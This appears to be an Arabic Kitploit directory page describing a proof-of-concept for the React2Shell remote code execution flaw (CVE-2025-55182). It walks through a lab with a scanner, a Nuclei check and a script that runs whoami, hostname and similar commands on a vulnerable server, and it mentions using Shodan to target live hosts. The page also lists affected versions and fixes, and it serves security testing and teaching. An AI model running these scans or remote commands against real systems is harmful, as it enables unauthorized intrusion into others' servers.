Skip to content
KitploitKITPLOIT
أدواتالمدونة
Log in
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
React2Shell-PoC-CVE-2025-55182 — إثبات مفهوم لاستغلال ثغرة CVE-2025-55182 (React2Shell) الخاصة بتنفيذ الأوامر عن بُعد (RCE) في مكونات خادم React. يتضمن ماسحًا للأنظمة المستهدفة الضعيفة وسكربت شل لتنفيذ الأوامر عن بُعد. مخصص لاختبار الأمان المصرح به والأغراض التعليمية فقط. | Kitploit
أدوات/GitHubGitHub/eagle-nett/react2shell-poc-cve-2025-55182
الاستطلاعماسحات الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubeagle-nett/react2shell-poc-cve-2025-55182

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

React2Shell-PoC-CVE-2025-55182

إثبات مفهوم لاستغلال ثغرة CVE-2025-55182 (React2Shell) الخاصة بتنفيذ الأوامر عن بُعد (RCE) في مكونات خادم React. يتضمن ماسحًا للأنظمة المستهدفة الضعيفة وسكربت شل لتنفيذ الأوامر عن بُعد. مخصص لاختبار الأمان المصرح به والأغراض التعليمية فقط.

عرض المستودع
2منذ 6 أشهرلم تتم المراجعة بعد

محاكاة استغلال React2Shell (CVE-2025-55182)

ملاحظة:

  • هذا المستند مخصص لأغراض التعلم والبحث الأمني فقط.
  • لا تستخدمه لمهاجمة الأنظمة دون إذن.

1. نظرة عامة

CVE-2025-55182، المعروف أيضًا باسم React2Shell، هو ثغرة Remote Code Execution (RCE) خطيرة تؤثر على React Server Components (RSC). ويستخدم بروتوكول Flight للتواصل بين العميل والخادم. عندما يطلب العميل البيانات، يستقبل الخادم حمولة (payload) ويحللها، مما قد يسمح للمهاجم بإدخال بنى خبيثة أو مقاطع تعليمات برمجية عشوائية يقبلها React على أنها صالحة.

البندالمحتوى
الخطورةCritical (CVSS 10.0)
النوعUnsafe Deserialization (CWE-502)
طريقة الهجومRemote, no authentication required
الإصدارات المتأثرة:React: 19.0.0, 19.1.0, 19.1.1, 19.2.0 و Next.js: 15.0.0 – 15.0.4, 15.1.0 – 15.1.8, 15.2.0 – 15.2.5, 15.3.0 – 15.3.5, 15.4.0 – 15.4.7, 15.5.0 – 15.5.6, 16.0.0 – 16.0.6

2. السبب

يعالج الخادم الحمولة القادمة من العميل دون تحقق كافٍ، مما يسمح للمهاجم بـ:

  • حقن حمولة خبيثة
  • تنفيذ تعليمات برمجية على الخادم
  • التعرض للاستغلال دون الحاجة إلى مصادقة المستخدم لأن هذه ثغرة تحدث قبل المصادقة.

تم اكتشاف أنشطة استغلال مرتبطة بهذه الثغرة منذ 5 ديسمبر 2025. معظم عمليات الاستغلال الناجحة نشأت من تقييمات فرق الهجوم. كل من بيئتي Windows وLinux متأثرتان.

3. التجربة العملية

التثبيت

pip install -r requirements.txt

افحص خادمًا معرضًا للثغرة:

python3 scanner.py -u https://example.com

أدخل المسار المراد فحصه (هنا أدخلت جهازي المعرض للثغرة وهو http://192.168.10.1:3000)

image

النتيجة التي حصلت عليها:

image
╰─ python3 scanner.py -u http://192.168.10.1:3000             

brought to you by assetnote

[*] Loaded 1 host(s) to scan
[*] Using 10 thread(s)
[*] Timeout: 10s
[*] Using RCE PoC check
[!] SSL verification disabled

[VULNERABLE] http://192.168.10.1:3000 - Status: 303

يمكنك أيضًا إجراء فحوصات إضافية حسب هدف الاستغلال لديك:

افحص قائمة بالخوادم:

python3 scanner.py -l hosts.txt

الفحص بعدة خيوط وحفظ النتائج:

python3 scanner.py -l hosts.txt -t 20 -o results.json

الفحص باستخدام ترويسات مخصصة:

python3 scanner.py -u https://example.com -H "Authorization: Bearer token" -H "Cookie: session=abc"

فحص أهداف Windows:

python3 scanner.py -u https://example.com --windows

استخدام طريقة كشف جانبية آمنة:

python3 scanner.py -u https://example.com --safe-check
image

كما ترى، نحن أمام ثغرة أمنية، مما يعني أن الخادم الذي نقدمه عرضة للهجوم من قبل المهاجم.


Nuclei

الآن سنستخدم Nuclei للتحقق مما إذا كان الخادم أعلاه مصابًا بثغرة لها PoC أم لا. تعمل هذه الوظيفة عن طريق إرسال طلبات مخصصة، وتقليل الإنذارات الكاذبة (false positive)، ودعم الفحص المتوازي.

nuclei -t scan.yaml -u http://192.168.10.1:3000

النتيجة التي تم الحصول عليها

[INF] Current nuclei version: v3.7.1 (latest)
[INF] Current nuclei-templates version: v10.4.0 (latest)
[INF] New templates added in latest release: 94
[INF] Templates loaded for current scan: 1
[INF] Executing 1 signed templates from projectdiscovery/nuclei-templates
[INF] Targets loaded for current scan: 1
[CVE-2025-55182] [http] [critical] http://192.168.10.1:3000
[INF] Scan completed in 431.97876ms. 1 matches found.
image

اكتشف النظام أن هذا الخادم معرض للثغرة ويمكن استغلاله عبر CVE-2025-55182. ومن هنا يمكنك أن ترى أنها ثغرة خطيرة ومهمة للغاية، وقد انتشرت لها الكثير من أدوات PoC على منصات التواصل الاجتماعي. ☺☺☺

4. طريقة الاستغلال

يمكنك أن ترى أن هذه المعلومات وحدها كافية لتأكيد وجود الثغرة الأمنية في التطبيق أعلاه. ولإثبات أنه يمكن استغلال هذا التطبيق لتشغيل أمر أو تنفيذ تعليمات برمجية عن بُعد، سأبدأ بـ PoC.

chmod +x scanner.sh

الاستخدام

# Check xem đối phương có vulnerable ko
./datscan.sh -d example.com

# Thực thi lệnh kiểm tra user hiện tại
./datscan.sh -d example.com -c "whoami"

# With full URL
./datscan.sh -d example.com -c "uname -a"
image

المعنى:

يعيد المستخدم الحالي الذي يقوم بتشغيل عملية الخادم

يساعد في تحديد:

  • تحت أي مستخدم يعمل التطبيق
  • مستوى الصلاحيات (منخفضة أو مسؤول)

=> هذا هو الأمر الأكثر أساسية لتأكيد نجاح RCE

ملاحظة

  • -d, --domain - domain/URL
  • -c, --command - الأمر المطلوب تنفيذه (مثال: whoami, hostname,...)

أمثلة

# Check xem tên máy
./datscan.sh -d http://192.168.10.1:3000/ -c hostname  

# Xác định phiên bản hệ điều hành
./datscan.sh -d http://192.168.10.1:3000/ -c ver 

# Kiểm tra command execution có hoạt động ổn định không
./datscan.sh -c "echo test"

./datscan.sh -d http://192.168.10.1:3000/ -c "echo %USERNAME%"

./datscan.sh -d http://192.168.10.1:3000/ -c "echo %COMPUTERNAME%"
معنى أوامر التنفيذالمحتوى
يعيد اسم المضيف (host name)يُستخدم من أجل:
- تحديد النظام المتأثر
- دعم الحركة الجانبية (lateral movement) (داخل البيئة الداخلية)
تحديد إصدار نظام التشغيلمهم من أجل:
-تقييم إمكانية مواصلة الاستغلال (privilege escalation)
- اختيار الاستغلال (exploit) المناسب
اختبار تنفيذ الأوامريُستخدم لتصحيح أخطاء الحمولة / الماسح الضوئي
يعيد اسم المستخدم الحاليفي هذه الحالة:
- إذا كان المستخدم ADMIN → فقد يكون لديه صلاحيات عالية
- أكثر أهمية من whoami في بعض حالات Windows
يعيد اسم المضيفيعيد اسم المضيف عبر متغير بيئة (environment variable)

صورة توضيحية بعد التنفيذ

image

هذه هي خطوة الاستطلاع الأولي (initial reconnaissance) بعد نجاح الاستغلال.

يساعدنا في التأكد من: عمل RCE، تحديد نظام التشغيل،...

تنبيه

نظرًا لأن هذه التجربة العملية أجريها في بيئة معملية شخصية لتجنب أي مسائل قانونية، فإن استخدام ترويسات HTTP لسرقة البيانات، أو المخرجات الكبيرة، أو الأحرف الخاصة قد يؤدي إلى:

  • ERR_INVALID_CHAR
  • تقليل الاستجابة (Response)
  • انتهاء المهلة (Timeouts)
image

الأوامر القصيرة (مثل: whoami, ver) أكثر موثوقية للتوضيح في بيئة الاختبار أعلاه.

إذا لم يعجبك ذلك، يمكنك استخدام Shodan لفحص عناوين IP مباشرة في البيئة الحقيقية وتنفيذ ما قمت به في هذه التجربة للاستغلال (غير مستحسن).

image

كما ذُكر أعلاه، هذه الأداة مخصصة للأغراض التعليمية واختبار الاختراق المصرح به فقط. لا تستخدم هذه الأداة لاختبار الأنظمة التي لا تملكها أو ليس لديك إذن باختبارها.

5. بعض طرق معالجة الثغرة

  • لا تثق في البيانات القادمة من العميل
  • تحقق صارم من المدخلات
  • تحديث الإصدار
    • React: >= 19.0.1 / 19.1.2 / 19.2.1
    • Next.js: >= 15.0.5 / 16.0.7

6. مراجع إضافية

  • CVE-2025-55182 – https://nvd.nist.gov/vuln/detail/CVE-2025-55182
  • CVE-2025-55182 - https://www.dynatrace.com/news/blog/cve-2025-55182-react2shell-critical-vulnerability-what-it-is-and-what-to-do/
تنزيل الأداة